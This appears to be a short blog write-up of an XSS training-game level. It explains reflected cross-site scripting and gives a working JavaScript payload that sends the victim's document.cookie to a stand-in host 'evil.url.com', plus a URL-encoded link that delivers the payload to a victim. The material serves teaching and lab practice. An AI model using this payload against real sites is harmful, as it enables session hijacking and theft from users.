This vulnerability allows us, as attackers, to inject client side code into pages which will be executed on a victim client with the rest of the client code on the page.
In this challenge, we attack ourselves. This is the first step, the PoC (proof of concept) to demonstrate the vulnerability existence. 'alert' was executed successfully therefore any other code will do.
The second step will be to exploit the vulnerability.
For example, an attacker can write a simple client side code to steal victim's cookies from the vulnerable site (why not all cookies ? read more SOP):
function httpGet(url)
{
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
}
httpGet("evil.url.com?cookies="+document.cookie);
Try to inject it to level 1 (wrap this code with <script>...</script>). As you can see, when the page with our injected code will be rendered on the victim, a HTTP request to our site (evil.url.com) will be generated with the user's cookies }:-D.
So our exploit is ready and tested locally. Now we want to attack the victim.
In the case of level 1 we will have to provide the victim with a url containg our code in the query parameter:
xss-game-url/level1/frame?query=%3Cscript%3E+function+httpGet%28url%29+{+var+xmlHttp+%3D+new+XMLHttpRequest%28%29%3B+xmlHttp.open%28%22GET%22%2C+url%2C+false%29%3B+++++xmlHttp.send%28null%29%3B+}+httpGet%28%22evil.url.com%3Fcookies%3D%22%2Bdocument.cookie%29%3B+%3C%2Fscript%3E
If the victim installed a plugin such as NoScript, this simple XSS attack will be prevented (recommended).
That's it. In this post I wanted to give a more whole picture about XSS attacks.
Happy XSSing ! :D (only on yourself of course ...)
